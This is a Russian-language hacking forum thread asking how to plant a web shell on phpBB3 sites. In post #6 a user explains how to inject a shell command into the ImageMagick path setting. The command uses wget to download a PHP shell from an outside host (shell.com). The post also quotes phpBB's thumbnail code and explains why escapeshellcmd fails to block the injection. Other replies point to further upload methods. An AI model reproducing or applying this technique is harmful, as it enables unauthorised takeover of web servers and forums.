Старый 04.02.2012, 19:40   #1
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию phpbb3 shell help

есть ли еще какие-нибудь способы заливки? кроме как этот.
нет возможности редактировать шаблоны, просто потому что их нет.
faza02 вне форума   Ответить с цитированием
Старый 19.02.2012, 21:11   #2
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

C искренной надеждой на ответ все-таки апну тему. Есть ли еще способы заливки, кроме правки стилей?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 19.02.2012, 22:12   #3
yesday
 
Регистрация: 28.11.2011
Сообщений: 36
Репутация: 12
По умолчанию

Например как описано тут попробуй (через bbcode в подписи): https://rdot.org/forum/showpost.php?p=4149&postcount=9
yesday вне форума   Ответить с цитированием
Старый 19.02.2012, 22:27   #4
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от yesday Посмотреть сообщение
Например как описано тут попробуй (через bbcode в подписи): https://rdot.org/forum/showpost.php?p=4149&postcount=9

Это способ для второй ветки phpbb, или я ошибаюсь?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 20.02.2012, 00:47   #5
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
есть ли еще какие-нибудь способы заливки? кроме как этот.
нет возможности редактировать шаблоны, просто потому что их нет.
Если просто нету вкладки Стили, то это легко попроавить, включив ее в админке, в настройках доступа вроде бы. На память не скажу точно)
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 22.04.2012, 23:23   #6
Лаврушкин
 
Регистрация: 05.07.2010
Сообщений: 27
Репутация: 15
По умолчанию

Навеяло пред темой.
Идем в General->Attachment settings
Ставим галочки на Allow attachments,Display images inline,Create thumbnail
Там есть Imagemagick path: херачим туда что то вроде
PHP код:
sh -'wget -O /кудабудемлитьшелл/sh.php http://shell.com/shell.txt' 
Потом идем в любую тему на форуме..и аттачим любую картинку.
в этот момент в файле includes/functions_posting.php
PHP код:
    if ($config['img_imagick'] && function_exists('passthru')) 
    { 
        if (
substr($config['img_imagick'], -1) !== '/'
        { 
            
$config['img_imagick'] .= '/'
        } 

        @
passthru(escapeshellcmd($config['img_imagick']) . 'convert' . ((defined('PHP_OS') && preg_match('#^win#i'PHP_OS)) ? '.exe' '') . ' -quality 85 -geometry ' $new_width 'x' $new_height ' "' str_replace('\\''/'$source) . '" "' str_replace('\\''/'$destination) . '"'); 

        if (
file_exists($destination)) 
        { 
            
$used_imagick true
        } 
    } 
в функцию passthru попадёт Imagemagick path. escapeshellcmd успешно пропустит кавычки. т.к Символы ' и " экранируются только в том случае, если они встречаются не попарно.
Борода в конце не помешает.
Зависимость естественно safe_mode = Off
Лаврушкин вне форума   Ответить с цитированием
Старый 17.05.2013, 16:34   #7
Re9ent
 
Регистрация: 16.01.2012
Сообщений: 18
Репутация: 1
По умолчанию

А на каких версиях тестировался этот способ? Признаться, у меня ни на одной не заработало.
Re9ent вне форума   Ответить с цитированием
Старый 18.05.2013, 11:41   #8
Лаврушкин
 
Регистрация: 05.07.2010
Сообщений: 27
Репутация: 15
По умолчанию

Цитата:
Сообщение от Re9ent Посмотреть сообщение
А на каких версиях тестировался этот способ? Признаться, у меня ни на одной не заработало.
функция create_thumbnail в ласт версии phpbb без изменения.
выше в этой функции есть ещё условия. быть может они не выполняются. может passthru в disable. может быть ещё не одно НО.
поэтому тестировать лучше всего на локалхосте.
Лаврушкин вне форума   Ответить с цитированием
Ответ

Метки
залить шелл в phpbb, phpbb3 шелл

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot